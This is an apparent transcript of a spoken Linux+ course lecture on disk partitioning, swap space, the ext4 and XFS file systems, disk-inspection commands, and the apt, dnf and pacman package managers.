That terabyte is what the wizard will use for the guided partitioning process. Once you press Accept and then Enter, it starts creating the partitions and eventually takes you to the boot menu, very similar to what we had with the live version: you restart the system, select your Kali Linux installation, and it loads Kali looking exactly like the live boot from the USB drive did, except this time you're running it directly on top of your hardware. So I restart my computer, and we're back to the presentation.

All right, let's talk about managing partitions, file systems, and disk usage. Here are some important partitioning concepts to consider and keep in mind. The role of partitions in isolating system or user data is mainly about managing space on a physical storage device. Think of partitions as logical divisions of a physical storage device, allowing the operating system to manage data in separate, isolated areas on the same device. They are key to organizing data, and they help with performance, security, and manageability.

The visual is really the big thing I want you to wrap your head around; I work well with visuals and I feel you may get value from them too. Looking at the left portion: say you have two physical storage devices, piece one and piece two, and piece two has been broken down into three separate pieces. That's partitioning. Those pieces can be divisions of the actual physical storage, or, as we'll talk about in the next slide, one of the primary partitions broken down into multiple pieces. As the name implies, partitioning breaks storage space down into parts. The storage could be the physical device in your computer (a server, your laptop, the Kali Linux machine, really anything), or an external storage device you've plugged in, like a USB drive. As you go through booting and setting up your machine, say you're installing Linux on one of your storage devices, or as a virtual machine, the installer asks which drive to use for partitioning; you select, for example, your external drive as the storage device you will partition, and from there it either guides you through its various options or lets you select manually, like we did in the installation portion of this video. That's essentially what partitioning itself is.

As for the advantages that come along with partitioning, they are threefold, speaking generally. First, isolation of data: partitions keep system files separate from user data, reducing the risk of user data corruption in the event of any kind of system failure.
You keep system data and user data separate, isolating those data types from each other, so that if anything happens to one, it doesn't affect the other. Second, performance: separating frequently accessed files, such as the contents of the /var (variable) directory, from system-critical files can improve the performance of the machine. Frequently accessed files include logs, dynamic data, mail spools, and so on; keeping them apart from system-critical files helps the device run smoother and faster. Third, security and recovery, and this is a really big one for our world on this channel, since we talk about security all the time and you'll probably work incident response at some point, where having backups and securing crucial data is very important. Isolating system files in a partition separate from user files makes it easier to manage permissions and restrict access to those system files, and it enables quicker recovery in the event of data corruption or system failure. Those are some of the key advantages of partitioning.

Now, here are examples of the common primary partitions. Most Linux setups break down to at most four primary partitions. One of the biggest and most important is the root partition: the main directory where everything is installed, including the home partition and the /var partition and everything else, which are extensions of the root partition (keep that word "extension" in mind). Root, home, and /var are typically the most common partitions, and when you go through the installation of any Linux system you'll see them as options: use one specific location as the single main partition, or break it down into these three common partitions. Then swap space is a separate partition for managing memory overflow, which we'll talk about in a little bit. These are the most common partitions, and in a lot of cases they are also the primary partitions.

Primary partitions are the main partitions that can be used directly to boot the operating system. The root partition, the forward slash (/) that represents root, is the primary partition. The limitation has to do with the traditional partitioning scheme, which allows a maximum of four primary partitions per hard drive; it is common to use primary partitions for the main operating system and important system data, and have your extended and logical partitions hold the other types of data. To recap: root is the main directory where everything in the OS is installed; home stores user-specific files (if you have five users, the home directory contains five separate directories, typically named after each user's username); and then there is the /var partition.
The /var partition isolates frequently changing files, like logs, which grow in size over time and eventually need to be wiped to preserve space on the computer's overall storage. If your computer has, say, one terabyte of storage, /var can take up a lot of it: without proper scheduling of backups and wipes (so the data can be moved from that main terabyte onto another storage device), it can overflow very quickly and consume a bulk of your one terabyte.

So those are the primary partition types. More often than not, in fact essentially always, root is the primary system partition: the main partition where the Linux operating system is installed, containing all the system files, libraries, binaries, and everything else. We covered those when we looked at the file system earlier: the library and binary directories, the system binaries, the temp folder, the logs, all those extensions of the root partition are where the system files are considered to be installed. Then you have the boot partition, which contains the bootloader, the kernel, and the other files needed to boot the Linux system; it is usually small, around 500 MB to 1 GB, because storing the kernel and bootloader doesn't take much space, but it is another main primary partition, since without it the system won't be able to boot or start. Then there is the home partition, also one of those primary partitions. Those three deal with the kinds of data that are stored, let's say permanently, on the machine.

And then there is the swap partition, which relates to memory rather than permanent data. It is used as virtual memory when the computer's physical RAM is maxed out and you need somewhere to park volatile, temporary data points until you don't need them anymore. Swap holds data similar to what sits in random access memory: volatile, dynamic data that comes and goes while the system is live. Typically, when the system reboots, the whole thing is reset and you don't have to worry about it anymore. Note that hibernation doesn't count as a system reboot: a reboot is when the system actually restarts, while hibernation is the machine going to sleep, after which the contents of RAM are recovered from the hibernation file (and the swap partition) so you can pick up where you left off. So root, boot, and home are more-or-less permanent partitions whose stored data you can access after reboot after reboot, while swap holds volatile data that is typically reset and wiped every time you reboot the computer.
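A hedged way to see this layout on a running system (which of /, /home, and /var are separate partitions depends on how the installer split things):

```bash
lsblk -f             # block devices, their partitions, file-system types, mount points
swapon --show        # any active swap partitions or swap files
df -h / /home /var   # disk usage of root, home, and var
```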
Those are our primary partitions; then we have the extended partitions. An extended partition is a container for additional logical partitions: it is not the actual storehouse of the data itself, it holds other logical partitions, and it exists to bypass the four-partition limit by dedicating one primary partition slot as the extended partition. Only one extended partition can be created on a physical drive, but it can contain numerous logical partitions, which means you can have essentially as many as you need within it. Extended partitions are commonly used on systems that need more than four partitions without using newer partitioning schemes like GPT. We're talking about a lot of traditional (legacy, MBR-style) Linux setups, which are still in use in the modern world, so as a Linux administrator you will most likely run across the original partitioning scheme: four primaries, one of which is extended and contains a bunch of other logical partitions, and you'll need to know it for the job. When you deal with a GPT partitioning scheme instead, things are simply easier, because it allows more than four primary partitions and lets you compartmentalize your data more directly.

Here are some extended examples. /var (with /var/log inside it) can be set up as a primary partition when you're doing your Linux installation, but it can also be one of the logical partitions, an extension of root: root is represented by the forward slash, /var is the extension, and inside it you have /var/log, /var/mail, and so on, a bunch of logical containers holding different types of data, such as log files, databases, mail spools, and any other dynamic content that is frequently used or updated. Splitting it out helps manage large amounts of frequently changing data, which makes it one of the most common extended/logical partitions. Then there is /tmp, the temporary files, another extension of the root partition that holds temporary data and can act as a logical partition. And /dev, which holds your machine's device files, is shown as another extension of root that can act as a logical partition as well. Essentially, you are extending the root drive, and within those directories you have a variety of other folders that act as the logical partitions stored inside those extended partitions. Hopefully that is starting to make sense.
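On an MBR-style disk you can see this structure directly; a hedged sketch, with an illustrative device name:

```bash
sudo fdisk -l /dev/sda
# On an MBR ("legacy") layout, partitions 1-4 are the primary/extended slots,
# and logical partitions inside the extended one are numbered from /dev/sda5 upward.
```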
stored inside those extended partitions. Hopefully that's starting to make sense.

Finally we have logical partitions: the subdivisions within an extended partition. Within a /home extended partition you can have a bunch of user folders, and each of those user folders ends up being a logical partition. Within /var you can have /var/mail, /var/log, and so on; each acts as a subdivision of that directory, and each ends up being a logical partition of that extended partition.

Going back to the earlier image for another visual of extended, primary, and logical partitions: say two of the pieces are our primary partitions; within one primary we have the extended container, and the pieces inside it could be the /var partition, the /dev partition, the /tmp partition, or the /home partition — they could act as anything. If you expand one of them, say the /var piece inside our extended partition, within it you'd have log, mail, and whatever else. That's how it breaks down: a primary gets designated as the extended container, and that container is broken down into multiple logical partitions.

It's essentially just a way to organize and compartmentalize your data. As with the benefits we talked about earlier, you get better access to things and better performance on the system; in case of security or backup issues you can isolate and reach specific areas much more easily; and if one thing crashes it doesn't take everything else down, and so on. Partitioning serves multiple purposes, and it's a fairly simple concept once you get a chance to wrap your head around it: you have up to four primary partitions; one of them can be turned into an extended partition; and that extended partition is a container for multiple logical partitions. If it helps, you can think of partitions as containers. Conceptually, that's all partitioning is.

To give you a few examples of how the file system looks: say you have an extended partition, /dev/sda4, on your disk. This partition doesn't store any data directly; it becomes a container for other logical partitions, and within it you can have multiple logical partitions that serve
various purposes. For example, within /dev/sda4 we can have /dev/sda5 allocated to /data. This is set up either during the partitioning step of the installation, or in the configuration file stored in the /etc directory, where all of these partition assignments are made; we'll talk about that in a moment. This logical partition is created inside the extended /dev/sda4 and assigned the mount point /data, meaning that when you access /data in your file system you're actually accessing this specific logical partition that houses all of that data. It may seem a little confusing at first, but I'll show you the tree structure and how these things connect so you have the visual as well. It's typically used for storing user data — documents, media files, etc. That's what the /data folder houses, and it gets mounted onto this logical partition sitting inside that extended partition.

We can also have /dev/sda7 inside /dev/sda4 — so sda5 is in there, and sda7 (I think it was supposed to be sda6 and I accidentally clicked seven). It's allocated to /backup: a third logical partition within this extension, assigned the mount point /backup, used specifically for storing backup files and system snapshots, which helps keep backup data organized separately from other system and user data. In the tree visual of this, the extended partition contains multiple logical partitions: one mounted at /data, one mounted at /var, and one mounted at /backup.

You don't need to go really deep into this — it's beyond the scope of what's covered in Linux+ — but you do need to understand the difference between primary, extended, and logical partitioning, so that when you're asked questions or looking at examples you can differentiate between the various partition types.

A final note: during installation, the wizard will guide you through partitioning and ask how you want to partition your hard disk. Even if you boot from a USB drive as a live boot, you can still choose USB persistence and keep your partitioning options; in that case you'll likely have to edit your partitions manually. You'd create the partitions using the fdisk or cfdisk command, and then mount each of the new partitions via the /etc/fstab configuration file. Either before or after this lecture, depending on how the edit comes together, you'll see this entire concept demonstrated as part of the installation wizard walkthrough.
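To make this concrete, here's a minimal sketch of what that mount configuration might look like for the layout above. The device names, mount points, and options are hypothetical placeholders, not something copied from a real install:

```bash
# Peek at the mount configuration (hypothetical layout):
cat /etc/fstab
# Sample entries — the fields are: device, mount point, fs type,
# mount options, dump flag, fsck order.
#   /dev/sda5  /data    ext4  defaults  0  2   <- user data
#   /dev/sda6  /var     ext4  defaults  0  2   <- logs, mail spools
#   /dev/sda7  /backup  ext4  defaults  0  2   <- backups, snapshots
```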
In 99% of environments there's going to be a wizard that guides you through the partitioning and does all of these things for you. If you want to boot from a USB you'll need to know how to configure the fstab configuration file, but more often than not you won't need to worry about it, because if you're booting from a USB you're usually only using it for its capabilities and not as a storage device — a completely different situation that's beyond the scope of this particular training series. So that's essentially how you ensure your partitions are created and configured during installation, and you will see it demonstrated either right before or right after this.

Right after this: swap space. Swap space is disk space designated to act as the overflow for the system RAM. When the physical RAM on your system is exhausted, the system uses swap space to temporarily hold inactive memory pages, allowing active processes to continue without crashing. Say you have a bunch of software open and a lot of it isn't actively being used: those memory pages get stored in the swap space, and your physical RAM is dedicated to whatever you're actively using. If that still isn't enough — if your swap space overflows as well as your physical RAM — that's when you see the system slow down drastically, and sometimes even crash, because you're overloading the machine beyond what it can handle. More often than not, though, when your physical RAM is maxed out the system just moves whatever is temporarily inactive — something minimized, a document you're not currently using — into inactive memory pages in swap. You can quickly call on them to bring them back to the foreground, and once they're back they move from the swap space into physical RAM again. So swap space is for inactive memory pages; keep that in mind. That's how the system alternates between what the physical RAM is processing and what's parked in the background, so to speak.
By doing that, swap space extends your memory's capacity. When the system would otherwise hang because memory demand exceeds what's available in physical RAM, the swap space acts as a buffer to prevent system crashes. It takes a lot to get there on modern computers: modern hardware is strong enough that you really don't hit a system crash unless you haven't rebooted in ages and have a million tabs and a bunch of software open. I haven't seen a crash on my own machines in a very long time, because the swap space along with the RAM I've chosen works very well — I like buying computers with a lot of physical RAM for video editing and gaming, and the CPU's clock speed contributes to the overall processing power too. With a strong CPU and plenty of RAM you're not going to worry about this kind of crash. But if you're dealing with a computer that's mainly a Linux data-processing box — acting as a database, say — and it can't handle the workload being thrown at it for whatever reason, the swap space will kick in and help alleviate some of the pressure on the physical RAM so that no crash happens. It extends the memory capacity of the physical machine.

Swap also facilitates hibernation, which we touched on earlier: it's involved when the system goes to sleep. When the system sleeps, a lot of what's inactive goes into those inactive memory pages — the data pages we referred to — which are stored away, and when the computer wakes up or comes out of hibernation, all of that is recalled from the swap space so your computer can pick up where it left off. That's really powerful: with a laptop, for example, you often don't turn it off, you just close the lid — that's going into hibernation — and when you lift the screen back up you are literally waking it, and it pulls its state back from swap. This applies to Linux, Windows, and macOS alike; swap space is not something inherent only to Linux. Different systems may name it differently, but the concept is universal: an extension of physical RAM capacity that keeps the system running smoothly and, if the computer goes to sleep, lets it recall the data and processes that were active so you can pick up where you left off.

Now, some general commands to keep in mind — these are important partitioning commands. To create a partition, you can use either the fdisk command or the parted command; we'll talk about both in depth shortly. These are sudo commands, so they require root permission, or at least that the user be on the sudoers list. Running sudo fdisk /dev/sda lets you create, modify, or delete partitions on that disk. The parted example creates a primary partition with the ext4 format spanning 1 MiB to 512 MiB. parted also has a graphical version outside the command line that's very intuitive — point and click, very easy — so if you're not on a command-line-only Linux machine and you actually have access to a graphical user interface, more often than not you'll end up using GParted, the graphical version of parted.
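As a quick reference, here's a minimal sketch of those two creation commands. /dev/sda is a placeholder — confirm the real target disk with lsblk before touching anything:

```bash
# Open fdisk's interactive mode on a disk (root required).
sudo fdisk /dev/sda

# Create a primary partition from 1MiB to 512MiB with parted.
# Note: the "ext4" here is a file system type hint — you still
# format the partition afterward with mkfs.
sudo parted /dev/sda mkpart primary ext4 1MiB 512MiB
```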
Next, some sample commands to view your current partitions. lsblk lists the block devices and the partitions associated with them, and fdisk -l lists all the partitions and their details. These are ways to see your current partitions, how much storage they're using, what they're assigned to, and so on. Then there are the sample commands for dealing with swap: mkswap, swapon, and swapoff. swapon and swapoff are fairly intuitive — you can tell what they do from the names — while mkswap makes a swap space at a particular location, i.e., it initializes a partition (or file) for use as swap, and swapon then activates that specific swap area.
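Here's a sketch of those viewing and swap commands together; /dev/sda3 stands in for whatever partition you've actually set aside for swap:

```bash
lsblk           # tree view of block devices and their partitions
sudo fdisk -l   # list all partitions with their details

sudo mkswap /dev/sda3   # initialize the partition as swap
sudo swapon /dev/sda3   # activate it
sudo swapoff /dev/sda3  # deactivate it again
```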
All right, now we need to look at file systems from the perspective of partitioning. This is partly a review of what we covered earlier: before, we talked about file systems in the context of where things are located and how they're broken down; now we look at them from the partitioning side.

ext4 is the fourth extended file system — the most recent version in the ext2/ext3 line — and it's the default in most Linux distributions. It's very reliable, and it supports large files and journaling. It's one of the most widely used file systems in Linux, typically set as the default in distributions like Ubuntu and Debian (and Kali Linux, which is Debian-based, runs ext4 as well). It builds upon the previous versions with enhanced reliability, speed, support for large files, and so on, so ext4 is most likely what you'll encounter on desktop platforms if you're doing Linux system administration on desktops.

The key features of ext4 — we've already talked about this, so briefly: journaling, which helps protect data integrity by recording changes before they're applied to the main file system, making recovery easier; large file support; backward compatibility, meaning it can work with ext2 and ext3, allowing users to mount and use those file systems without reformatting, which is very convenient; and delayed allocation and extents, which improve disk input/output performance by reducing fragmentation — the breaking up of data — and by better managing storage space. As expected, it should be the better version of ext2/ext3: better performance, better storage management, better I/O — the input of your requests and calls into the system, and the output from the system that answers those requests.

The typical use cases for ext4 are, as mentioned, desktop systems, personal laptops, and general-purpose servers. Because it's so common and versatile, it's used in a lot of everyday scenarios, and it's a good option for people who prioritize data integrity and who may need backward compatibility with older file systems. As a beginner Linux administrator you're not going to be dealing with massive data centers and the like, so you'll be working with ext4 file systems more often than not. To make an ext4 file system, you run sudo mkfs.ext4 — "make file system," ext4 flavor — against the target partition, and to check or repair one you run fsck.ext4 — "file system check" — against the partition it lives on.
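A minimal sketch of both, assuming a hypothetical partition /dev/sdb1 (fsck is normally run against an unmounted file system):

```bash
# Create an ext4 file system on the partition.
sudo mkfs.ext4 /dev/sdb1

# Check/repair it — unmount first if it's mounted.
sudo umount /dev/sdb1
sudo fsck.ext4 /dev/sdb1
```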
Then we have XFS, a file system built for performance and scalability, and a very popular choice in enterprise environments — actual data centers and high-performance workloads. It's a 64-bit file system designed for speed and scale, used in environments handling lots of users or scenarios where high data throughput is critical. It was originally developed by Silicon Graphics and has become a popular choice in Linux distros like CentOS and Red Hat Enterprise Linux, the enterprise choices for Linux. The notable characteristics of XFS are that it's fast and scalable, so you can have a large environment with a lot of users or a lot of machines using its data; high data throughput means it serves and processes data very quickly compared to ext4. It's designed for big environments.

The key features: efficient metadata management, meaning it handles metadata-heavy workloads — frequent file creation, deletion, and renaming. That doesn't seem like a big deal until you have a thousand users constantly creating, renaming, and deleting files; that process simply needs to be fast at scale. Journaling — a concept you'll hear about a lot, since nearly every file system you'll deal with journals, just in case there's a crash and you don't want to lose data. Scalability: it handles very large file systems, making it suitable for systems with large data sets and high-performance workloads, which matters when you have a lot of employees, computers, or servers. And it can grow file systems without requiring them to be unmounted, providing flexibility in storage management — again, very important in data centers, where you need to work with the storage without unmounting it and cutting your users off. You can do that allocation dynamically: resize the file system's allocation for a given machine or data center live, in a running environment, so the users can keep using the system while you, as the administrator, do what you need to do.

The typical use cases are, of course, enterprise servers and data centers; environments with heavy input/output performance and scalability demands such as databases, media servers, and scientific computing; and high-performance applications with large files that need to be accessed and managed efficiently, like video production or big-data analytics. Those are the environments that require, or make the best use of, XFS.

And here are the example commands: you create one with mkfs.xfs — make file system, XFS flavor. You grow one with xfs_growfs against the mount point; resizing requires the file system to be mounted, and it's supported only for increasing the size, so keep in mind you cannot shrink an XFS file system, only grow it. And you check or repair one with xfs_repair. These are the example commands for using and interacting with XFS.
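Sketched out, with /dev/sdb1 and /mnt/data as placeholder names:

```bash
# Create an XFS file system on a partition.
sudo mkfs.xfs /dev/sdb1

# Grow a *mounted* XFS file system to fill its partition —
# growing only; XFS cannot shrink.
sudo xfs_growfs /mnt/data

# Check/repair — the file system must be unmounted first.
sudo umount /mnt/data
sudo xfs_repair /dev/sdb1
```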
And of course we have the swap file system. Swap space is the dedicated partition or file that's used to extend memory, as we've already discussed. It's unique compared to everything else we've talked about because it's not a traditional file system: it's used for live data, an extension supplementing the physical memory — our RAM, random access memory. It isn't storing files; it's a live kind of space that allows the system to avoid out-of-memory issues. Memory-overflow management kicks in when the system RAM is fully utilized (we've been through this), and it supports hibernation (that too).

Swap partition versus swap file is a concept worth noting here. A swap partition is created as a separate partition, which can offer performance advantages due to the dedicated space on the disk. A swap file, which a lot of modern systems use, lives inside an existing partition; it's more flexible and can be resized or removed quickly without having to deal with all of the partitioning commands. Previously, the swap partition was something you actually had to create using fdisk, parted, or similar tools, whereas with a swap file you can resize it, remove it, do anything, without mounting, unmounting, and going through the whole partitioning process. So more modern systems will have a swap file, and the older legacy systems will have swap partitions.

The size recommendations for your swap file or swap partition really come down to the amount of RAM. If there isn't much RAM, the system benefits from more swap space — roughly twice the RAM size (I won't pin down exactly what counts as "not that much"). If you have ample RAM — say, more than 8 GB — you don't need much swap: you can get away with 2 GB, and in some cases none at all if the memory itself is plentiful. It just depends on the physical size of the RAM. Unless it's a really old machine with very little RAM, you're not often going to run across a server that doesn't have enough — it feels a bit redundant to say, but it is worth keeping in mind. You may deal with a legacy computer, or a company expanding beyond what its hardware was bought for, and you'll need a swap space or swap file to tide things over so nothing crashes until they can upgrade their systems and buy better RAM or bigger machines.

Here are some example commands. To create and activate a swap partition, you make the swap space first with mkswap, then turn it on with swapon. Creating and activating a swap file takes a little more: you allocate the file with fallocate — and note that the -l is a lowercase L, not a one — at a size like 2G, then change its permissions (the restrictive permissions that the system or root user requires), then run mkswap against the swap file path, and then enable it with swapon. So: first you allocate something for the swap file, then you give it the permissions it needs, then you make it the swap space, and then you turn it on so that specific swap file can be used. And if you want to look at the usage and see how it's working, swapon --show or free -h will give you the swap usage data points you need.
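Here's the whole sequence as a sketch; /dev/sda3 and /swapfile are placeholder names:

```bash
# Swap partition: initialize, then activate.
sudo mkswap /dev/sda3
sudo swapon /dev/sda3

# Swap file: allocate, lock down permissions, initialize, activate.
sudo fallocate -l 2G /swapfile   # -l is a lowercase L (length)
sudo chmod 600 /swapfile         # root-only access, as swap requires
sudo mkswap /swapfile
sudo swapon /swapfile

# Inspect swap usage.
swapon --show
free -h
```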
All right, now we're going to talk about the commands that let us do everything we just covered. fdisk is one of the more common ones: a command-line utility used to create, modify, and delete partitions on a disk. It's commonly used for managing the Master Boot Record (MBR) — the traditional scheme that allows four primary partitions — but it can also handle GPT, the GUID Partition Table, which allows more primary partitions. The key functions include things like the following — and this is in no way meant to be the full list of commands you can run; just do man fdisk and you'll get the full list of what you can do with fdisk. sudo fdisk -l lists all the available partitions and basic disk information about them. Interactive mode: run fdisk with the path to the partition's disk — replace it with your actual target disk — and it opens an interactive session where you can add, delete, or edit partitions; an interactive way of working instead of running individual commands. After you've made all your modifications in interactive mode, you type w and press Enter, and that writes all the changes you just made to the specific disk you're working with. You'd create a new partition using the n option in fdisk, select or choose the partition type you want (for example, one you'll format as ext4), assign the size, and then press w to commit the changes. This is an overview — we'll do this in detail when we get to the command-line portion — and you can also get plenty of walkthroughs by going to Gemini or GPT and asking it to guide you through creating a partition and the various options for mounting it, deleting it, and so on. But we will go through those examples as well.
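A sketch of a typical fdisk session on a placeholder disk /dev/sdb:

```bash
sudo fdisk -l          # list disks/partitions and their details
sudo fdisk /dev/sdb    # open interactive mode on the target disk
# Inside the fdisk prompt:
#   n  create a new partition (pick type, number, size)
#   d  delete a partition
#   p  print the current partition table
#   m  list all available commands
#   w  write your changes to disk and exit
#   q  quit without saving
```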
Then we have parted, a more versatile command-line tool than fdisk: it supports both the MBR and GPT schemes, and it's ideal for resizing, copying, and modifying partitions without losing data. You'll probably run across both tools; their command-line structure is relatively similar and, for the most part, they let you do the same things — you just need to know that both exist. There's an interactive mode, very similar to fdisk: you run sudo parted (with the disk) to enter it, and you can create, delete, and resize partitions with commands like mkpart (make partition), rm (remove), and resizepart — very intuitive, which I think is one of the big things about it. When you're using large drives — and 2 terabytes in today's world still counts as a very large drive — parted is often preferred because it natively supports GPT, which is what you need for disks requiring more than four primary partitions. The smaller disks often use the older MBR scheme, and GPT covers the disks going well over two terabytes; when you're not even dealing with media, just text documents, configuration files, and logs, 2 TB is a lot of space. So parted ends up being the premier, first choice for that. An example command to create a new partition: run parted against the disk — the physical device you want it stored on — then mkpart to make a partition, a primary partition with the ext4 format, sized here at 1000 megabytes, which works out to about a gigabyte. You can then run a disk utility or a variety of command-line tools to see which partitions are actually on your device, and from there choose the right path as you create your new partitions, extensions, or logical partitions.

Then we have GParted, which stands for the GNOME Partition Editor: basically the graphical front end for parted. It's available on most Linux distributions that actually have a GUI — if it's a command-line-only Linux it doesn't exist there, but most desktop versions, and anything with a graphical user interface, have a GParted version of parted available. You can do everything you'd do with parted through an intuitive graphical interface: it's very user friendly, it provides a visual representation of partitions and unallocated space, it allows easy resizing, creating, and deleting of partitions, and it's ideal for users who prefer graphical over command-line management and need a quick way to modify partitions. Since you won't be using the command line for the work itself, you basically just need to know how to install and launch it: sudo apt install gparted (we'll go through apt, a package manager for Debian/Ubuntu), or sudo dnf install gparted for Fedora, and then sudo gparted to open the graphical interface. The installation and launch are done on the command line; the rest happens in the GUI.
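And the parted/GParted equivalents, again with /dev/sdb as a stand-in:

```bash
sudo parted /dev/sdb   # interactive mode: mkpart, rm, resizepart,
                       # print, quit
# One-shot: a ~1 GB primary partition typed as ext4.
sudo parted /dev/sdb mkpart primary ext4 1MB 1000MB

# GParted — install, then launch the GUI.
sudo apt install gparted   # Debian/Ubuntu
sudo dnf install gparted   # Fedora
sudo gparted
```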
Okay, so now we need to list the block devices. We've created the devices; now we want to display information about them, including the disks and the partitions on those disks, in a format that's user friendly or close to it — which is why it's a tree format, as you've already seen. lsblk lists the block devices, and it's a great way to get a quick overview of the storage devices on a system. The key features: a hierarchical display — the tree structure we referred to earlier — showing the relationship between the main device and its various partitions, along with the essential info like device name, size, type, and mount points. You're not going to get a lot of crazy detail from it, but it's a very common tool for seeing what all the block devices are — essentially the physical devices and the partitions attached to them — in a nice tree format. Some example commands: lsblk displays a simple tree view of all the devices; with -f it includes the file system information, like file system type and UUID; and -d shows only the main devices, excluding the partitions. If you have a very large environment and don't want to see every partition, the -d flag shows you just those main devices.

Then we have df, disk free, which basically reports what's being used and what's free — the free space for each of the mounted file systems, as well as the used space. If you want to see specific data about file system disk space usage, df is the tool. It displays total and available space for each file system; df -h displays sizes in megabytes and gigabytes, making the information more readable; and df -T shows the type of each file system along with the usage stats. And, for example, df -h /home will show the disk usage just for the file system holding the home directory. As with all of these tools, you can find the full set of options in each one's manual page; we're just going through sample commands here, and when we get to the practical section and start using the command line, we'll go through a lot of this in depth. This is a quick overview so you gain some familiarity; the great details come later.

du is disk usage, used to check the space consumed by specific files and directories, providing a detailed view of which directories eat the most space — it's not a per-file-system tool. When you run du -sh on a specific directory, it provides a summary of its total size; when you run du by itself, it shows disk usage for each directory and subdirectory; and du with a threshold of 100M displays only files and directories taking up over 100 megabytes. Command examples: du -sh on /var/log gives you the total size of the /var/log directory itself; du -ah on your home directory provides a detailed recursive view of home usage, listing the individual files and directories — which can be massive. You don't want to run that against a super large directory just to eyeball it in the terminal: the output can be enormous, and the terminal is limited in how much it can actually show you on the display, so even if you scroll all the way up you may not see everything. If anything, pipe or redirect the output of that command into a separate file so you can look at it outside your terminal.
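Put together, a minimal disk-inspection sketch — the report file name is just an example, and --threshold is a GNU du option:

```bash
lsblk            # tree of devices and partitions
lsblk -f         # add file system type and UUID
lsblk -d         # main devices only, no partitions

df -h            # per-file-system usage, human-readable sizes
df -T            # include the file system types

du -sh /var/log              # total size of one directory
du -ah ~ > du_report.txt     # full recursive listing, sent to a
                             # file because the output can be huge
du -h --threshold=100M ~     # only entries larger than 100 MB
```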
All right, now we can run through our package managers and the commands associated with them. An intro to package managers: they're tools for managing software on Linux — a tool for managing other tools, helping you install tools, update tools, and so on. They automate the process of installing, updating, and removing software, and they make it relatively easy — or, if you know what you're doing and you're familiar with the command line, easier — to maintain a consistent, up-to-date system. They handle dependencies, meaning the stuff a piece of software requires to run: each program may require a certain set of dependencies, and the package manager handles them, making sure any required libraries and tools are installed alongside whatever software you're installing. So when you run sudo apt install such-and-such, it won't just install the tool; it'll install all the dependencies and libraries that tool needs to run properly. That saves you a lot of manual dependency resolution and potential conflicts. You don't have to hunt down all the different dependencies — which gets very tedious, especially with software that requires a lot of elements and adjacent tools to run properly. You run one command, and that one command gets all the dependencies you need, the libraries, and so on. Very, very useful.

We have apt, the one I've used most because I usually run Ubuntu and Debian versions of Linux. It stands for the Advanced Package Tool and is very common. If you want to install something: sudo apt install, then the name of the package. If you want to update: sudo apt update and sudo apt upgrade — and you can technically run both in one line; that's what the double ampersands are for. (I don't think we've covered operators yet — I was just doing a Linux fundamentals tutorial — but two ampersands chain the commands: it runs the first one, and then runs the next. So it updates the list of software, then upgrades anything that needs it.) And if you want to remove something: sudo apt remove, then the package name. Very intuitive, and most package managers follow a similar pattern. apt is known for its ease of use, robustness, and extensive repository of software packages, and again, it's the most commonly encountered because it's associated with Ubuntu and Debian, the desktop-friendly versions of Linux. As you can tell, the commands themselves are super intuitive and very user friendly.
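A sketch of the apt workflow; htop is just a stand-in for any package name:

```bash
sudo apt install htop                # install a package + its deps
sudo apt update && sudo apt upgrade  # refresh lists, then upgrade
sudo apt remove htop                 # remove a package
```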
We have yum — the Yellowdog Updater, Modified — and dnf, the Dandified YUM, for the Red Hat family: CentOS and Fedora are the distributions that use them. It's pretty similar to what we did with apt: sudo yum install or sudo dnf install plus the package name, update, remove — pretty much the same, you just use yum or dnf instead of apt depending on which version of Linux you're running. And typically, if you try sudo apt install such-and-such on one of these systems, the terminal will actually tell you that apt isn't what's used here — this system uses yum, or this system uses dnf — and it will give you an updated command to run instead: sudo yum install, package name. So it's also very intuitive and very user friendly. yum has been replaced by dnf in the newer distros like Fedora; dnf offers improved performance, better dependency resolution, and a modern design, but essentially they operate on the same distributions of Linux.

And finally we have pacman — my favorite name. It's the package manager used for Arch Linux, and pacman's commands are a little different from apt or yum: sudo pacman -S plus the package name is the installation (that's a capital S, by the way); sudo pacman -Syu runs the software updates; and sudo pacman -R plus the package name removes the software. It's known for simplicity, speed, and flexibility, a favorite among Arch Linux users, and it handles binary packages and source packages with ease — in my experience all the others do too, but this one is specific to the Arch Linux distribution, so you need to be aware of it. The name pacman here is not the video game; it's the package manager for Arch Linux, and those are its commands for installing, updating, and removing software.
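The same workflow sketched for the Red Hat family and Arch; htop again is a placeholder package:

```bash
# Fedora / CentOS (dnf; older systems use yum the same way):
sudo dnf install htop
sudo dnf upgrade
sudo dnf remove htop

# Arch Linux (note the capitalized flags):
sudo pacman -S htop    # install
sudo pacman -Syu       # refresh databases and update everything
sudo pacman -R htop    # remove
```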
Finally for this section: updating, removing, and troubleshooting packages. Why update packages and run system upgrades? A few reasons. The first is obviously security: patches need to be applied to certain packages as vulnerabilities are discovered. When you consider the approach of ethical hacking and pentesting, the whole point is trying to break a package to find its vulnerabilities; sometimes vulnerability scanners don't do their job, and sometimes there's an announcement — "we found this vulnerability, go patch this specific package." This is not uncommon; it happens very frequently, and running an update through your package manager should be habitual, maybe even daily: every time you log into Linux, or before you install something, or before you use a specific package, run a quick update to make sure you're on the most recent version with all of its patches. Updated versions also bring new security features, and there are dependency updates too — new dependencies that the updated version requires. Those are the common items under the security bracket. Then there's stability: bugs get fixed in these packages. A lot of this is common sense; you just need to understand that updating packages, and the system itself, needs to be a regular thing. Check for system and package updates regularly so that compatibility is there, performance is there, there are no bugs running, no security issues, and the functionality and user experience stay good. And of course, if you're in a regulated environment, you need to be compliant: if something touches customer data, it isn't updated, and data leaks through a known security vulnerability, the company is looking at grounds for a lawsuit — and guess what, you as the Linux administrator are going to be fired, because this is something so simple, so easily done, and so powerful. Keep all of your packages and your system up to date; it's not complicated, it's a couple of commands, and it keeps you compliant with whatever regulatory environment you're in.

Now, the update and upgrade commands: sudo apt upgrade updates all of the installed packages on a system running apt, and sudo dnf upgrade runs the updates for the packages installed on a dnf system. If you don't want to upgrade each package individually as you're about to use it, you can just run this routine upgrade with apt, dnf, pacman, or whatever it is, and make sure everything on your system and in your environment is fully upgraded.

I would say removing and cleaning up packages is just as important as running updates. The main reason is to free up space; there are also orphaned packages and unused dependencies — things you simply don't use anymore — taking up storage. If you run an upgrade on something, you should also run autoremove to clear out whatever has been orphaned. A lot of the time you'll get a notice from the system, some kind of alert that asks "are you sure you want to remove this? it's associated with that," and you can say yes or no; for the most part it will get rid of things that are orphaned, legacy, grandfathered, or unused. Treat removal as being as important a strategy as the upgrading and updating of all your packages.

